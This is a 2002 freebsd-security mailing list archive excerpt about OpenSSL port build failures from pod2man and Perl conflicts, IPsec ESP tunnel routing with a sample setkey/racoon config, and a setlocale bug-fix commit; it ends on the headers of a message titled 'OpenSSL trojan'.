Getopt/Long.pm @INC (@INC contains: /isr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/ lib/perl5/site_perl/5.005/i386-freebsd /usr/local/lib/perl5/site_perl/5.005 .) at ../util/pod2man.pl line 308. BEGIN failed compilation aborted at ../../util/pod2man.pl line 308. *** Error code 2 ----- Original Message ----- From: "Christopher Schulte" To: ; Sent: Thursday, August 01, 2002 11:11 AM Subject: Re: openssl build > At 12:04 PM 8/1/2002 -0500, Reuben A. Popp wrote: > >/usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking > >for > >another pod2man ... > >Can't locate Pod/Man.pm in @INC (@INC contains: > > Are you using /usr/local/bin/pod2man (maybe from a perl5.6 install?) versus > /usr/bin/pod2man? If so, give /usr/bin/pod2man a whirl. > > -- > Christopher Schulte > http://www.schulte.org/ > Do not un-munge my @nospam.schulte.org > email address. This address is valid. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 22: 2:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2B46C37B400 for ; Thu, 1 Aug 2002 22:02:12 -0700 (PDT) Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2FBE943E42 for ; Thu, 1 Aug 2002 22:02:11 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp) Received: from [192.168.1.8] (FLA9Aaa001.chb.mesh.ad.jp [61.193.68.129]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id OAA11408; Fri, 2 Aug 2002 14:02:09 +0900 (JST) Date: Fri, 02 Aug 2002 14:02:06 +0900 From: Shunichi Konno To: security@freebsd.org Subject: Re: openssl build In-Reply-To: <200208011205.04188.gobinau@digitalcelt.com> References: <200208011205.04188.gobinau@digitalcelt.com> Message-Id: <20020802134227.98FE.KONNO@hal.rcast.u-tokyo.ac.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-2022-JP" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.05.03 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It is because Makefile tests /usr/local/bin/pod2mantest with Perl 5.6 (/usr/local/bin/perl), but Makefile runs pod2mantest with Perl 5.005_03 (/usr/bin/perl). This is the main reason and we will have such a problem only if we have Perl 5.6 in our path. The workaround is to get out /usr/local/bin from your path temporarily. If pod2mantest test with /usr/bin/pod2man fail and there is no more pod2man in your path, it will return pod2man.pl perl script which is distributed with OpenSSL package and it works fine: % cd /usr/ports/security/openssl/work/openssl-0.9.6e/util % ./pod2mantest ignore /usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking for a nother pod2man ... No working pod2man found. Consider installing a new version. As a workaround, we'll use a bundled old copy of pod2man.pl. ../../util/pod2man.pl The best way to solve our problem is to fix Makefile or pod2mantest, but I don't have enough time today. I've not fixed it yet. Thanks. On Thu, 1 Aug 2002 12:04:45 -0500 "Reuben A. Popp" wrote: RAP> installing man1/CA.pl.1 RAP> /usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking for RAP> another pod2man ... RAP> Can't locate Pod/Man.pm in @INC (@INC contains: RAP> /usr/local/lib/perl5/site_perl/5.005/i386-freebsd RAP> /usr/local/lib/perl5/site_perl/5.005 . /usr/libdata/perl/5.00503/mach RAP> /usr/libdata/perl/5.00503) at /usr/local/bin/pod2man line 16. RAP> BEGIN failed--compilation aborted at /usr/local/bin/pod2man line 16. RAP> *** Error code 2 RAP> RAP> Stop in /usr/ports/security/openssl/work/openssl-0.9.6e. RAP> *** Error code 1 RAP> RAP> Stop in /usr/ports/security/openssl. $B:#Ln(B $B=S0l!?(BKONNO Shunichi The University of Tokyo (IPC, Grad Sch of Inf Sci & Tech) E-Mail: konno@hal.rcast.u-tokyo.ac.jp HomePage: http://www.hal.rcast.u-tokyo.ac.jp/~konno/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 2:45:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 89A2137B400 for ; Fri, 2 Aug 2002 02:45:53 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id C9FCA43E5E for ; Fri, 2 Aug 2002 02:45:51 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g729jM5H006826 for ; Fri, 2 Aug 2002 11:45:23 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g729jLhd006814 for ; Fri, 2 Aug 2002 11:45:21 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: <5VuZasl8L8@dmeyer.dinoex.sub.org> From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: About the openssl hole Date: Fri, 02 Aug 2002 11:39:47 +0200 X-Mailer: Dinoex 1.79 References: <3D47402F.83B37CBA@pantherdragon.org> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020802000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org patpro wrote: > If I just : > - update openSSL port > - recompile every port that use openSSL (openSSH, Apache+mod_ssl, ....) > will I be safe from remote attack ? openSSH Apache+mod_ssl .... works fine. Ervery port that inlcudes Makefile.ssl will use the port version. You can check it with ldd: libcrypto.3 or libssl.3 are used. Some ports will still link with the base versions, there are open PR's about it ... kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 4:57:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6B6A137B400 for ; Fri, 2 Aug 2002 04:57:39 -0700 (PDT) Received: from buckley.rt.net.tr (buckley.rt.net.tr [212.65.128.19]) by mx1.FreeBSD.org (Postfix) with SMTP id B3F9943E42 for ; Fri, 2 Aug 2002 04:57:37 -0700 (PDT) (envelope-from ismail@o2.net.tr) Received: (qmail 3832 invoked by uid 1010); 2 Aug 2002 11:50:45 -0000 Received: from unknown (HELO o2.net.tr) (ismail@o2.net.tr@212.65.128.101) by buckley.rt.net.tr with SMTP; 2 Aug 2002 11:50:45 -0000 Message-ID: <3D4AFE83.3040800@o2.net.tr> Date: Fri, 02 Aug 2002 14:49:55 -0700 From: Ismail YENIGUL User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530 X-Accept-Language: tr, en-us, en MIME-Version: 1.0 To: normal Cc: security@FreeBSD.ORG Subject: Re: openssl build References: <200208011205.04188.gobinau@digitalcelt.com> <001101c239d7$7c9d4a30$a5e8a3ce@effortnix> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hi Pod module is used only for openssl docs installiation. remove "install_docs" value from Makefile line 632 normally it looks like following install: all install_docs this should be install: all regards Ismail YENIGUL http://www.enderunix.org normal wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Yeah, I've run into this problem too :-( I ended up with 50 extra > symlinks (i installed a new perl, it ended going into /usr/local when > openssl was looking in /usr), I just copied all the binaries to where > they belong. I'm sure more people will/have run into this problem. > Any ideas besides mine will be great. > > http://www.hackmania.net > > - ----- Original Message ----- > From: "Reuben A. Popp" > To: > Sent: Thursday, August 01, 2002 11:04 AM > Subject: openssl build > > > >>-----BEGIN PGP SIGNED MESSAGE----- >>Hash: SHA1 >> >>Hi all, >> >>I've run into a small conundrum, while building the recent port of >>openssl ((openssl-0.9.6e). It appears that the build works fine, >>except to the point where it begins to install the man pages. The >>following is my error snippet. This box is running 4.6-STABLE if >>that helps any. And now, the snippet: >> >>making all in apps... >>making all in test... >>making all in tools... >>created directory `/usr/openssl' >>created directory `/usr/openssl/man' >>created directory `/usr/openssl/man/man1' >>created directory `/usr/openssl/man/man3' >>created directory `/usr/openssl/man/man5' >>created directory `/usr/openssl/man/man7' >>installing man1/CA.pl.1 >>/usr/bin/pod2man does not work properly ('MultilineTest' failed). >>Looking for another pod2man ... >>Can't locate Pod/Man.pm in @INC (@INC contains: >>/usr/local/lib/perl5/site_perl/5.005/i386-freebsd >>/usr/local/lib/perl5/site_perl/5.005 . >>/usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503) at >>/usr/local/bin/pod2man line 16. >>BEGIN failed--compilation aborted at /usr/local/bin/pod2man line >>16. *** Error code 2 >> >>Stop in /usr/ports/security/openssl/work/openssl-0.9.6e. >>*** Error code 1 >> >>Stop in /usr/ports/security/openssl. >>[gobinau@www (/usr/ports/security/openssl)] (10:32:56)# >> >>Thanks in advance for any insight/suggestions :D >> >>.. >>With threats of gas and rose motif >>Their lips apart like a swollen rose >>Their tongues extend, and then retract >>A redcap, a redcap, before the kiss, before the kiss. >>.. >> >>-----BEGIN PGP SIGNATURE----- >>Version: GnuPG v1.0.7 (FreeBSD) >> >>iD8DBQE9SWo3l5MJ0L8ObVoRAup5AJsHGVLDKehkJudCiBl53xDUOHvx6wCfX74A >>1aiKX2B72BJHpzK2J2nkuNY= >>=Pnek >>-----END PGP SIGNATURE----- >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message > > > -----BEGIN PGP SIGNATURE----- > Version: PGPfreeware 7.0.3 for non-commercial use > Comment: https://www.hackmania.ath.cx > > iQA/AwUBPUoBEmuqlDKIknpUEQIkQACg/c1BULmLdRO04ddC1I8vk9Q83ocAnjBK > rJCw8wvnb1GcWXjIt+HMQnit > =2rds > -----END PGP SIGNATURE----- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > This e-mail was scanned by RAV AntiVirus! > > O2Net - Yeni Nesil Ýletiþim Çözümleri http://www.o2.net.tr > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 5: 3:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD63637B484 for ; Fri, 2 Aug 2002 05:03:16 -0700 (PDT) Received: from ws1-4.us4.outblaze.com (205-158-62-50.outblaze.com [205.158.62.50]) by mx1.FreeBSD.org (Postfix) with SMTP id 8D2D643E8A for ; Fri, 2 Aug 2002 05:02:11 -0700 (PDT) (envelope-from mewtwo@catlover.com) Received: (qmail 26903 invoked by uid 1001); 31 Jul 2002 11:48:28 -0000 Message-ID: <20020731114828.26902.qmail@mail.com> Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit MIME-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Received: from [192.9.200.182] by ws1-4.us4.outblaze.com with http for mewtwo@catlover.com; Wed, 31 Jul 2002 19:48:28 +0800 From: "Security Officer" To: freebsd-security@freebsd.org Date: Wed, 31 Jul 2002 19:48:28 +0800 Subject: [Q] FreeBSD IPSec Discussion. X-Originating-Ip: 192.9.200.182 X-Originating-Server: ws1-4.us4.outblaze.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello. Can anyone tell me which is the most appropriate list to discuss FreeBSD IPSec configuration and interoperability problems (n.b. not freebsd-hackers)? I can't seem to locate a list. Or is it all so simple no one ever has any questions? -- __________________________________________________________ Sign-up for your own FREE Personalized E-mail at Mail.com http://www.mail.com/?sr=signup Get 4 DVDs for $.49 cents! plus shipping & processing. Click to join. http://adfarm.mediaplex.com/ad/ck/990-1736-3566-59 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 6: 4:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AABE437B400; Fri, 2 Aug 2002 06:04:14 -0700 (PDT) Received: from musique.teaser.net (musique.teaser.net [213.91.2.11]) by mx1.FreeBSD.org (Postfix) with ESMTP id B0DB943E3B; Fri, 2 Aug 2002 06:04:13 -0700 (PDT) (envelope-from e-masson@kisoft-services.com) Received: from notbsdems.nantes.kisoft-services.com (chantilly.kisoft-services.com [193.56.60.242]) by musique.teaser.net (Postfix) with ESMTP id 4DDFD7250B; Fri, 2 Aug 2002 15:04:12 +0200 (CEST) Received: by notbsdems.nantes.kisoft-services.com (Postfix, from userid 1001) id BBD155ADB9; Fri, 2 Aug 2002 14:56:39 +0200 (CEST) To: "Crist J. Clark" Cc: Matthew Grooms , dlavigne6@cogeco.ca, Mailing List FreeBSD Security Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...] References: <20020730074813.GF89241@blossom.cjclark.org> <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com> From: Eric Masson In-Reply-To: <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com> (Eric Masson's message of "Fri, 02 Aug 2002 09:44:08 +0200") X-Operating-System: FreeBSD 4.6-STABLE i386 Date: Fri, 02 Aug 2002 14:56:39 +0200 Message-ID: <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com> Lines: 38 User-Agent: Gnus/5.090007 (Oort Gnus v0.07) XEmacs/21.4 (Common Lisp, i386--freebsd) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Emss" == Eric Masson writes: >>>>> "Crist" == Crist J Clark writes: Follow-up to myself and -security re-added. Crist> I've never figured out why people use gif(4) interfaces when ESP Crist> does the tunneling for you. Emss> Maybe because I've never succeeded establishing a esp tunnel Emss> beetween two lans without gif(4). I've tried without gif tunnel (erroneous rc.conf modification) and it works, maybe murphy's law had prevented this before ;) There's one question still remaining : - if there are more than one esp tunnel configured, how is traffic routed ? Example : - One esp tunnel from 192.168.0.1 to 10.93.0.1 - One esp tunnel from 192.168.0.1 to 10.44.0.1 With only one tunnel configured, netstat -rn on the security gateway doesn't show any routes to the remote networks nor host. With a second tunnel added, are there any additionnal configuration steps or will the kernel do the routing automagically ? Links or example setup if needed ? Thanks in advance Eric Masson -- Bref, j'en ai lu des conneries dans fufe, j'en ai même écrit, mais là, on flirte avec le ruban bleu. -+- RM in : - Ca mérite le GNUban bleu -+- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 6:41: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E97CC37B400 for ; Fri, 2 Aug 2002 06:41:03 -0700 (PDT) Received: from femme.sapphite.org (pcp02268182pcs.longhl01.md.comcast.net [68.50.99.190]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9994D43E3B for ; Fri, 2 Aug 2002 06:40:59 -0700 (PDT) (envelope-from trish@listmistress.org) Received: from femme.sapphite.org (trish@localhost [127.0.0.1]) by femme.sapphite.org (8.12.5/8.12.5) with ESMTP id g72DecmQ005652; Fri, 2 Aug 2002 09:41:59 -0400 (EDT) (envelope-from trish@listmistress.org) Received: from localhost (trish@localhost) by femme.sapphite.org (8.12.5/8.12.5/Submit) with ESMTP id g72DebY9005649; Fri, 2 Aug 2002 09:40:37 -0400 (EDT) X-Authentication-Warning: femme.sapphite.org: trish owned process doing -bs Date: Fri, 2 Aug 2002 09:40:36 -0400 (EDT) From: Trish Lynch X-X-Sender: To: Security Officer Cc: Subject: Re: [Q] FreeBSD IPSec Discussion. In-Reply-To: <20020731114828.26902.qmail@mail.com> Message-ID: <20020802093902.K497-100000@femme.sapphite.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 31 Jul 2002, Security Officer wrote: > Hello. Can anyone tell me which is the most > appropriate list to discuss FreeBSD IPSec > configuration and interoperability problems > (n.b. not freebsd-hackers)? I can't seem to > locate a list. Or is it all so simple no one > ever has any questions? No, its so complicated that nobody has the answers :) Here or -questions would most likely be the best place. I just recently learned a hell of a lot about KAME/racoon by trial and error over the past couple weeks, including interop issues between other vendor's software/hardware. (specifically Ravlins), so If I can help, I'll attempt to. -Trish -- Trish Lynch trish@bsdunix.net FreeBSD The Power to Serve Ecartis Core Team trish@listmistress.org http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 8: 2:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4B5F037B400; Fri, 2 Aug 2002 08:02:52 -0700 (PDT) Received: from mail.seton.org (mail.seton.org [207.193.126.172]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8703C43E6A; Fri, 2 Aug 2002 08:02:51 -0700 (PDT) (envelope-from mgrooms@seton.org) Received: from aus-gwia.aus.dcnhs.org (aus-gwia.aus.dcnhs.org [10.20.10.211]) by mail.seton.org (Postfix) with ESMTP id 0A516D011A; Fri, 2 Aug 2002 10:02:51 -0500 (CDT) Received: from AUS_SETON-MTA by aus-gwia.aus.dcnhs.org with Novell_GroupWise; Fri, 02 Aug 2002 10:02:50 -0500 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Fri, 02 Aug 2002 10:02:38 -0500 From: "Matthew Grooms" To: , Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoontroubles, help please ...] Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Eric, How traffic will be routed is defined by your near/far encryption domains that were configured via setkey/spdadd directives. These src/dst domains are compared to packet src/dst to determine if they need to be encrypted. The IPSEC peer gateway is also defined for each spdadd so that your gateway knows where to forward the packets after the ecrypt/encap step. This works a bit different for gif enabled tunnels because the IPSEC peer gateways are actually defined by the private tunnel interface end points, not the publicly routable interfaces. Its also possible to use a mixture if giff'd and 'vanila' ESP tunnels. I am doing this right now so I have attached my config script as an example. echo Initializing IPSEC security policies ... # create tunnel device ifconfig gif0 create 2> /dev/null # public addresses ( external ) gifconfig gif0 66.90.146.202 66.68.118.215 # private addresses ( internal ) ifconfig gif0 inet 10.22.200.1 10.1.2.1 netmask 255.255.255.0 # delete all existing SPD and SAD entries setkey -FP setkey -F setkey -c << EOF spdadd 10.22.200.0/24 10.1.2.0/24 any -P out ipsec esp/tunnel/10.22.200.1-10.1.2.1/require; spdadd 10.1.2.0/24 10.22.200.0/24 any -P in ipsec esp/tunnel/10.1.2.1-10.22.200.1/require; spdadd 10.22.200.0/24 10.20.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require; spdadd 10.20.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require; spdadd 10.22.200.0/24 10.21.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require; spdadd 10.21.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require; spdadd 10.22.200.0/24 10.23.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require; spdadd 10.23.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require; EOF echo Restarting IKE daemon ... killall racoon 2> /dev/null sleep 1 /usr/local/sbin/racoon -l /var/log/racoon.log -v I hope this answers your question. -Matthew >>> Eric Masson 08/02/02 08:07 AM >>> >>>>> "Emss" == Eric Masson writes: >>>>> "Crist" == Crist J Clark writes: Follow-up to myself and -security re-added. Crist> I've never figured out why people use gif(4) interfaces when ESP Crist> does the tunneling for you. Emss> Maybe because I've never succeeded establishing a esp tunnel Emss> beetween two lans without gif(4). I've tried without gif tunnel (erroneous rc.conf modification) and it works, maybe murphy's law had prevented this before ;) There's one question still remaining : - if there are more than one esp tunnel configured, how is traffic routed ? Example : - One esp tunnel from 192.168.0.1 to 10.93.0.1 - One esp tunnel from 192.168.0.1 to 10.44.0.1 With only one tunnel configured, netstat -rn on the security gateway doesn't show any routes to the remote networks nor host. With a second tunnel added, are there any additionnal configuration steps or will the kernel do the routing automagically ? Links or example setup if needed ? Thanks in advance Eric Masson -- Bref, j'en ai lu des conneries dans fufe, j'en ai même écrit, mais là, on flirte avec le ruban bleu. -+- RM in : - Ca mérite le GNUban bleu -+- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 8:23: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 54DFA37B400 for ; Fri, 2 Aug 2002 08:23:05 -0700 (PDT) Received: from dogme.burningman.com (ns3.burningman.com [66.180.227.135]) by mx1.FreeBSD.org (Postfix) with SMTP id E831D43E70 for ; Fri, 2 Aug 2002 08:23:04 -0700 (PDT) (envelope-from glen@burningman.com) Received: (qmail 99672 invoked by uid 89); 2 Aug 2002 15:26:59 -0000 Received: from localhost.burningman.com (HELO burningman.com) (127.0.0.1) by localhost.burningman.com with SMTP; 2 Aug 2002 15:26:59 -0000 Message-ID: <3D4AA44A.6010306@burningman.com> Date: Fri, 02 Aug 2002 08:24:58 -0700 From: Glen Mehn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0) Gecko/20020530 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Trish Lynch Cc: Security Officer , freebsd-security@FreeBSD.ORG Subject: Re: [Q] FreeBSD IPSec Discussion. References: <20020802093902.K497-100000@femme.sapphite.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: localhost.burningman.com 1.6.2 900/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trish Lynch wrote: >On Wed, 31 Jul 2002, Security Officer wrote: > > > >>Hello. Can anyone tell me which is the most >>appropriate list to discuss FreeBSD IPSec >>configuration and interoperability problems >>(n.b. not freebsd-hackers)? I can't seem to >>locate a list. Or is it all so simple no one >>ever has any questions? >> >> > >No, its so complicated that nobody has the answers :) > >Here or -questions would most likely be the best place. I just recently >learned a hell of a lot about KAME/racoon by trial and error over the past >couple weeks, including interop issues between other vendor's >software/hardware. (specifically Ravlins), so If I can help, I'll attempt >to. > IIRC, there's some side-discussion on the frees/wan site about this-- usually in the realm of "freeswan + kame + nortel" or somesuch. I don't know what's currently there, but a year ago there was at least one doc, and you should be able to extrapolate, although you may need to learn a lot about frees/wan as well... -g To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 8:33:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F1EB737B400 for ; Fri, 2 Aug 2002 08:33:24 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5EDF643E72 for ; Fri, 2 Aug 2002 08:33:24 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g72FXLSE077540; Fri, 2 Aug 2002 11:33:22 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020802113549.0541a008@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Fri, 02 Aug 2002 11:36:35 -0400 To: "Andrey A. Chernov" , security@FreeBSD.ORG From: Mike Tancsa Subject: Re: [ache@FreeBSD.org: cvs commit: src/lib/libc/locale setlocale.c] In-Reply-To: <20020802011225.GA6411@nagual.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) X-Spam-Status: No, hits=-3.4 required=7.0 tests=IN_REP_TO version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Was this still going to be MFC'd ? ---Mike At 05:12 AM 02/08/2002 +0400, Andrey A. Chernov wrote: >Please fill security advisory for this fix (first part). That original BSD >code bug can be exploitable. > >----- Forwarded message from "Andrey A. Chernov" ----- > >Date: Thu, 1 Aug 2002 18:04:49 -0700 (PDT) >From: "Andrey A. Chernov" >Subject: cvs commit: src/lib/libc/locale setlocale.c >To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org > >ache 2002/08/01 18:04:49 PDT > > Modified files: > lib/libc/locale setlocale.c > Log: > Prevent out of bounds writting for too many slashes case. > Replace strnpy + ='\0' with strlcpy > > MFC after: 1 day > > Revision Changes Path > 1.35 +10 -14 src/lib/libc/locale/setlocale.c > >----- End forwarded message ----- > >-- >Andrey A. Chernov >http://ache.pp.ru/ > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 8:48:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3AE4537B400 for ; Fri, 2 Aug 2002 08:48:39 -0700 (PDT) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6146243E6A for ; Fri, 2 Aug 2002 08:48:38 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 6CA59573C for ; Fri, 2 Aug 2002 10:48:37 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g72FmaC25313 for freebsd-security@freebsd.org; Fri, 2 Aug 2002 10:48:36 -0500 (CDT) (envelope-from hawkeyd) Date: Fri, 2 Aug 2002 10:48:36 -0500 From: D J Hawkey Jr To: security at FreeBSD Subject: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802104836.A16486@sheol.localdomain> Reply-To: hawkeyd@visi.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: 